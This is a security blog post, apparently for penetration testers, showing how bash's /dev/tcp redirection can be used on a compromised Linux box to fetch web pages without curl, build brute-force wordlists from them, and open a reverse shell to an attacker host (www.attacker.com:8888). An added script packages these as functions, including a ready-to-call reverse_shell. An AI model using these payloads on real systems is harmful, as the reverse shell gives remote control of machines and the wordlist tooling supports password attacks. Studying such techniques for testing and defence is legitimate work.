I will start linking here some of the things that could be interesting and useful. Let's start off with a Bash-fu technique for opening TCP connections from a (supposedly pwned) Linux box without any extra tooling (it only initiates connections; there is no listening counterpart):
Now the question arises: when could these network redirections be helpful? First, bash can be used without third-party tools to grab data from the network. The example below fetches this blog's main page (the request is written with a bare "\n\n"; HTTP formally wants CRLF, but most servers accept it):

    exec 5<> /dev/tcp/blog.rootshell.be/80
    printf "GET / HTTP/1.0\n\n" >&5
    cat <&5
    exec 5>&-
Very convenient if you don't have links or curl installed. Just pipe the output to other commands. This can be used to generate dictionary files for a brute-force attack: save the page to a temporary file, strip the HTML tags with sed and split the remaining text into one word per line:

    exec 5<> /dev/tcp/blog.rootshell.be/80
    printf "GET / HTTP/1.0\n\n" >&5
    cat <&5 > foo.tmp
    exec 5>&-
    sed -e 's/<[!a-zA-Z/][^>]*>//g' foo.tmp | tr " " "\n"
Another nice example is to make bash "phone home". Let's launch a reverse shell to an attacker box: stdin is the socket, and stdout and stderr are both duplicated onto it, so the whole shell session goes over the connection (a listener such as netcat must already be waiting on the attacker side):

    victim# bash 0</dev/tcp/www.attacker.com/8888 1>&0 2>&0
As the bash shell is very common, this can be very interesting! Just use your imagination to find other examples. A final remark: this feature is not available in all pre-compiled or packaged bash builds! Some UNIX flavors consider it dangerous (which is true!) and build bash without it. If you want to compile your own bash with the feature enabled, the configure flag is "--enable-net-redirections".
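The three tricks above (fetch, wordlist, reverse shell) collected into one bash script, as an added example that is not part of the original post. It wraps each one in a function, adds a check for whether the running bash was built with net redirections (based on the error you get when the feature is missing), and generalises the post's `sed | tr` pipeline into a deduplicating wordlist builder that also splits on punctuation. The Host header, the CRLF line endings, the sample HTML and the helper names are my own additions; `blog.rootshell.be`, `www.attacker.com` and port 8888 are placeholders taken from the post.

```shell
#!/usr/bin/env bash
# Added example, not from the original post: the /dev/tcp tricks wrapped in
# functions, plus the wordlist pipeline run on a constructed sample page so
# the text-processing part can be exercised offline.  Requires bash (the
# /dev/tcp pseudo-files are a bash feature, not a kernel one).

# Heuristic check for a bash built with --enable-net-redirections.  A bash
# without the feature treats /dev/tcp/... as an ordinary path and fails with
# "No such file or directory"; with the feature you get a connect() error
# instead (port 9, discard, is normally closed, so only the *kind* of failure
# matters).  Assumes English error messages.
has_net_redirections() {
    local err
    err=$( { exec 3<> /dev/tcp/127.0.0.1/9; } 2>&1 ) || true
    case $err in
        *"No such file or directory"*) return 1 ;;
        *) return 0 ;;
    esac
}

# Plain HTTP/1.0 GET over /dev/tcp, printing headers and body.  The post uses
# a bare "\n\n"; HTTP wants CRLF and virtual hosts want a Host header, so
# both are added here.  Usage: http_get host [port] [path]
http_get() {
    local host=$1 port=${2:-80} path=${3:-/}
    exec 5<> "/dev/tcp/$host/$port" || return 1
    printf 'GET %s HTTP/1.0\r\nHost: %s\r\nConnection: close\r\n\r\n' "$path" "$host" >&5
    cat <&5
    exec 5>&-
}

# Drop the HTTP headers (everything up to the first empty line, CR tolerated)
# so only the body reaches the next stage.
http_body() {
    awk 'body { print; next } { sub(/\r$/, "") } $0 == "" { body = 1 }'
}

# HTML on stdin -> deduplicated wordlist on stdout.  Same tag-stripping sed as
# the post, then every non-alphanumeric run becomes a line break (so "a@b.c"
# splits cleanly), tokens shorter than 4 chars are dropped, duplicates removed.
html_to_wordlist() {
    sed -e 's/<[!a-zA-Z/][^>]*>//g' \
        | tr -cs '[:alnum:]' '\n' \
        | awk 'length($0) >= 4' \
        | LC_ALL=C sort -u
}

# Reverse shell from the post: a fresh bash with stdin, stdout and stderr all
# redirected to one socket.  Something must already be listening on the
# attacker side, e.g. `nc -l -p 8888` (traditional netcat) or `nc -l 8888`
# (OpenBSD netcat).  Wrapped in a function so nothing connects by accident.
reverse_shell() {
    local host=$1 port=$2
    bash 0<"/dev/tcp/$host/$port" 1>&0 2>&0
}

# Constructed sample page standing in for a fetched intranet front page.
SAMPLE_HTML='<!DOCTYPE html>
<html><head><title>Welcome to ExampleCorp intranet</title></head>
<body>
<!-- internal build 2024 -->
<h1>ExampleCorp Intranet Portal</h1>
<p>Contact the helpdesk at helpdesk@examplecorp.test or call ext. 4242.</p>
<p>Project codenames: Blackbird, Skyfall, Skyfall.</p>
</body></html>'

# Offline demo.  Against a live host the equivalent would be:
#   http_get blog.rootshell.be 80 / | http_body | html_to_wordlist > words.txt
if has_net_redirections; then
    echo "# this bash has net redirections"
else
    echo "# this bash was built without --enable-net-redirections"
fi
printf '%s\n' "$SAMPLE_HTML" | html_to_wordlist
```

The tag-stripping sed is the post's own and has the same limits: it only removes tags that open and close on one line, and a comment containing a literal `>` will leak part of itself into the wordlist. For a real target, run `http_body` before `html_to_wordlist` so header values like `Server:` do not end up in the dictionary.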
Also, a tool to help with PDF creation/modification/analysis. Sounds promising: